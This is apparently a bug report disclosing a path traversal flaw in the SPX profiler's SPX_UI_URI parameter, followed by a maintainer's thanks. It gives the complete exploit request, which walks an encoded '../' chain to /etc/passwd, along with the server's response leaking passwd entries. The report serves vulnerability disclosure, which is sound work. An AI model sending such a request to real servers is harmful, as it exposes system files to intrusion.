Path traversal in SPX_UI_URI parameter

[offseq]

It's possible to retrieve system files through SPX_UI_URI parameter:

Request:

GET /?SPX_KEY=dev&SPX_UI_URI=%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/2
Host: www.[redacted].staging.[redacted].com
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36
Connection: close
Cache-Control: max-age=0

Response:

HTTP/2 200 OK
Server: nginx
Date: Fri, 26 Jul 2024 10:26:11 GMT
Content-Type: application/octet-stream
Content-Length: 1479
Content-Security-Policy: upgrade-insecure-requests

root:x:0:0:root:/root:/bin/bash
messagebus:x:499:499:User for D-Bus:/run/dbus:/usr/bin/false
nobody:x:65534:65534:nobody:/var/lib/nobody:/bin/bash
man:x:13:62:Manual pages viewer:/var/lib/empty:/sbin/nologin
lp:x:498:489:Printing daemon:/var/spool/lpd:/sbin/nologin
systemd-timesync:x:484:484:systemd Time Synchronization:/:/sbin/nologin
systemd-coredump:x:485:485:systemd Core Dumper:/:/sbin/nologin
rpc:x:483:65534:user for rpcbind:/var/lib/empty:/sbin/nologin
[truncated]

[NoiseByNorthwest]

Thanks for reporting this issue